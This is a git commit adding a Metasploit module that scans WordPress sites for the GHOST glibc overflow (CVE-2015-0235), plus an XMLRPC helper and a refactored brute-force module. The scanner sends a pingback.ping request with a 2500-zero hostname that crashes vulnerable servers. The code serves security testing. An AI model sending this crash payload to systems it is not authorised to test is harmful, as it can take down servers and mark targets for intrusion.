add wordpress ghost scanner module

bug/bundler_fix
Christian Mehlmauer 2015-01-30 15:29:51 +01:00
parent aec0067d14
commit a0eaf2f626
No known key found for this signature in database
GPG Key ID: BCFF4FA966BC32C7
4 changed files with 134 additions and 22 deletions

View File

@ -11,6 +11,7 @@ module Msf
require 'msf/http/wordpress/uris' require 'msf/http/wordpress/uris'
require 'msf/http/wordpress/users' require 'msf/http/wordpress/users'
require 'msf/http/wordpress/version' require 'msf/http/wordpress/version'
require 'msf/http/wordpress/xmlrpc'
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::HTTP::Wordpress::Base include Msf::HTTP::Wordpress::Base
@ -20,6 +21,7 @@ module Msf
include Msf::HTTP::Wordpress::URIs include Msf::HTTP::Wordpress::URIs
include Msf::HTTP::Wordpress::Users include Msf::HTTP::Wordpress::Users
include Msf::HTTP::Wordpress::Version include Msf::HTTP::Wordpress::Version
include Msf::HTTP::Wordpress::XmlRpc
def initialize(info = {}) def initialize(info = {})
super super

View File

@ -0,0 +1,40 @@
# -*- coding: binary -*-
module Msf::HTTP::Wordpress::XmlRpc
# Determines if the XMLRPC interface is enabled by sending a demo.sayHello reuqest
#
# @return [Boolean] true if the interface is enabled
def wordpress_xmlrpc_enabled?
xml = wordpress_generate_xml_rpc_body('demo.sayHello')
res = send_request_cgi(
'uri' => wordpress_url_xmlrpc,
'method' => 'POST',
'ctype' => 'text/xml;charset=UTF-8',
'data' => xml
)
return true if res && res.body =~ /<string>Hello!<\/string>/
return false
end
# Extracts the Wordpress version information from various sources
#
# @param method_name [String] The XMLRPC method to call
# @param params [String] The XMLRPC method params
# @return [String] xml string
def wordpress_generate_xml_rpc_body(method_name, *params)
xml = "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?>"
xml << "<methodCall>"
xml << "<methodName>#{method_name}</methodName>"
xml << "<params>"
params.each do |p|
xml << "<param><value><string>#{p}</string></value></param>"
end
xml << "</params>"
xml << "</methodCall>"
return xml
end
end

View File

@ -0,0 +1,91 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::HTTP::Wordpress
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress XMLRPC Ghost vulnerability scanner',
'Description' => %q{
This module can be used to determine hosts vulnerable to the Ghost vulnerability via
a call to the WordPress XMLRPC interface. If the target is vulnerable, the system
will segfault and return a server error. On patched systems a normal XMLRPC error
is returned.
},
'Author' =>
[
'Robert Rowley',
'Christophe De La Fuente' ,
'Chaim Sanders' ,
'Felipe Costa' ,
'Jonathan Claudius' ,
'Karl Sigler' ,
'Christian Mehlmauer' # metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2015-0235' ],
[ 'URL', 'http://blog.spiderlabs.com/2015/01/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235.html'],
[ 'URL', 'http://blog.sucuri.net/2015/01/critical-ghost-vulnerability-released.html']
]
))
register_options(
[
OptInt.new('COUNT', [false, 'Number of iterations', 2500]),
], self.class)
end
def count
datastore['COUNT']
end
def generate_pingback_xml(target, valid_blog_post)
wordpress_generate_xml_rpc_body('pingback.ping', target, valid_blog_post)
end
def run_host(ip)
unless wordpress_and_online?
print_error("#{peer} - Looks like this site is no WordPress blog")
return
end
unless wordpress_xmlrpc_enabled?
print_error("#{peer} - XMLRPC interface is not enabled")
return
end
ghost = "0" * count
payload = "http://#{ghost}/#{Rex::Text.rand_text_alpha(7)}.php"
xml = wordpress_generate_xml_rpc_body('pingback.ping', payload, payload)
res = send_request_cgi(
'uri' => wordpress_url_xmlrpc,
'method' => 'POST',
'ctype' => 'text/xml;charset=UTF-8',
'data' => xml
)
if res.nil? || res.code == 500
print_good("#{peer} - vulnerable to GHOST")
report_vuln(
:host => ip,
:proto => 'tcp',
:port => datastore['RPORT'],
:name => self.name,
:info => "Module #{self.fullname} found GHOST vulnerability",
:sname => datastore['SSL'] ? "https" : "http"
)
else
print_status("#{peer} - target not vulnerable to GHOST")
end
end
end

View File

@ -42,30 +42,9 @@ class Metasploit3 < Msf::Auxiliary
deregister_options('BLANK_PASSWORDS') # we don't need this option deregister_options('BLANK_PASSWORDS') # we don't need this option
end end
def xmlrpc_enabled?
xml = "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?>"
xml << '<methodCall>'
xml << '<methodName>demo.sayHello</methodName>'
xml << '<params>'
xml << '<param></param>'
xml << '</params>'
xml << '</methodCall>'
res = send_request_cgi(
'uri' => wordpress_url_xmlrpc,
'method' => 'POST',
'data' => xml
)
if res && res.body =~ /<string>Hello!<\/string>/
return true # xmlrpc is enabled
end
return false
end
def run_host(ip) def run_host(ip)
print_status("#{peer}:#{wordpress_url_xmlrpc} - Sending Hello...") print_status("#{peer}:#{wordpress_url_xmlrpc} - Sending Hello...")
if xmlrpc_enabled? if wordpress_xmlrpc_enabled?
vprint_good("XMLRPC enabled, Hello message received!") vprint_good("XMLRPC enabled, Hello message received!")
else else
print_error("XMLRPC is not enabled! Aborting") print_error("XMLRPC is not enabled! Aborting")